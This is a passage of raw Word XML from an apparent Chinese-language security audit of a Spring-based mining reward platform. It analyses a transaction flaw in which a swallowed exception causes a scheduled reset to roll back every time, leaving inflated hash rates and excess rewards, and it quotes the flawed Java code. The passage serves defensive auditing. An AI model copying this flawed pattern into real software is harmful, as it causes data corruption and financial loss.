        </w:rPr>
        <w:t>userMinerRepository.save(m)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>chargedExpireTime=null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）全部回滚；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1233"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.save(u)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 更新）全部回滚；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1234"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>60 秒后调度再次触发，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findExpiredCharging(now)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 再次命中同一批矿机，进入相同的失败循环，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无限期重复</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持久化数据与业务逻辑永久背离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：DB 中矿机保持 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>chargedExpireTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍为过去时刻），用户实体的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 永远保留包含充电加速比的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>虚高值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">。若后续奖励发放、收益结算等逻辑读取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段（而非实时调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），相关用户将以虚高算力持续获得超额奖励，造成平台资金损失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1235"/>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numPr>
          <w:numId w:val="1236"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Scheduler 每 60 秒通过 AOP 代理调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，外层事务开启；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1237"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">循环内通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（Spring Bean 代理）调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，PROPAGATION_REQUIRED → 加入外层事务；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内部：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 完成算力计算 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加写锁 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.save(u)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将新 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入事务缓冲区 → 若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userSeasonService.updateSeasonData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等抛 RuntimeException，Spring AOP 标记外层事务 rollback-only；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1239"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> catch 块吞噬异常 → 方法正常返回 → AOP 代理 commit → 检测 rollback-only → 全量回滚 → 所有矿机状态重置和算力更新均撤销。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1240"/>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 xml:space="preserve">：若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段被收益/奖励计算逻辑引用，持续虚高的算力将造成平台持续超额发放奖励，财务损失随触发异常后累计时间线性增长。</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定时任务入口：PowerScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = 60_000)</w:t>
              <w:br/>
              <w:t>@Transactional  // ← 开启外层事务 TX_OUTER</w:t>
              <w:br/>
              <w:t>public void resetExpiredCharging() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime now = LocalDateTime.now();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; expired = userMinerRepository.findExpiredCharging(now); // ← 查询过期矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (expired.isEmpty()) return;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    Set&lt;Long&gt; affectedUserIds = expired.stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">        .map(UserMiner::getUserId).filter(id -&gt; id != null).collect(Collectors.toSet());</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    for (UserMiner m : expired) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        m.setIsCharged(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        m.setChargedExpireTime(null);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userMinerRepository.save(m); // ← 写入 TX_OUTER 缓冲区（尚未提交）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (Long userId : affectedUserIds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            minerService.recalcUserLevelAndHashRate(userId); // ← PROPAGATION_REQUIRED → 加入 TX_OUTER</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                             //   若内部抛 RuntimeException，</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                             //   Spring AOP 调用 setRollbackOnly()</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                             //   将 TX_OUTER 不可逆地标记为 rollback-only</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) {}  // ← 吞噬异常，流程继续，但 TX_OUTER 已污染</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 方法正常返回 → Spring @Transactional AOP 代理尝试 commit(TX_OUTER)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // → 检测到 rollback-only → 强制回滚 + 抛出 UnexpectedRollbackException</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // → 所有 userMinerRepository.save(m) 全部撤销，矿机 isCharged 永远不会被置 0</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 被调用方（共享 TX_OUTER）：MinerService.java</w:t>
              <w:br/>
              <w:t>@Transactional  // PROPAGATION_REQUIRED（默认）→ 加入 TX_OUTER，不新建独立事务</w:t>
              <w:br/>
              <w:t>public void recalcUserLevelAndHashRate(Long userId) {</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int maxLevel = miners.stream().mapToInt(UserMiner::getMinerLevel).max().orElse(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int maxStarLevel = miners.stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(m -&gt; m.getStarLevel() != null ? m.getStarLevel() : 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .max(Integer::compareTo).orElse(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal totalHash = computeBaseTotalHashRate(userId);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(userId).ifPresent(u -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int oldLevel = u.getCurrentLevel() != null ? u.getCurrentLevel() : 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int userNewLevel = Math.max(maxLevel, oldLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        u.setCurrentLevel(userNewLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        u.setCurrentTotalHashRate(totalHash); // ← 更新算力写入 TX_OUTER 缓冲区</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userRepository.save(u);              // ← 写入 TX_OUTER 缓冲区（未提交）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (userNewLevel &gt; oldLevel) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            taskExecutionService.updateProgress(u.getId(), "8", 1); // ← 可能抛 RuntimeException</w:t>
              <w:br/>
              <w:t xml:space="preserve">            grantUsdtOnLevelUp(userId, oldLevel + 1, userNewLevel); // ← 可能抛 RuntimeException</w:t>
              <w:br/>
              <w:t xml:space="preserve">            levelRewardService.claimLevelReward(userId, userNewLevel); // ← 可能抛 RuntimeException</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    });</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userSeasonService.updateSeasonData(userId, maxLevel, maxStarLevel, totalHash);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 可能抛 RuntimeException → Spring AOP 将 TX_OUTER.setRollbackOnly() → 漏洞触发点</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本漏洞属于事务管理缺陷类，由系统内部定时调度触发，无需 HTTP 入口，不适用 POC 构造。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 触发条件及影响步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1241"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">存在至少一台矿机满足 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged=1 AND chargedExpireTime &lt; NOW()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，调度任务开始处理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1242"/>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recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用链中任意一处（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateSeasonData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>claimLevelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 锁超时等）抛出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>RuntimeException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring 事务切面将外层事务标记 rollback-only，异常被 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>catch (Exception ignored)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 吞噬；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1244"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">外层方法返回时 commit 触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UnexpectedRollbackException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，所有矿机 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 更新及用户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 更新全部回滚；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
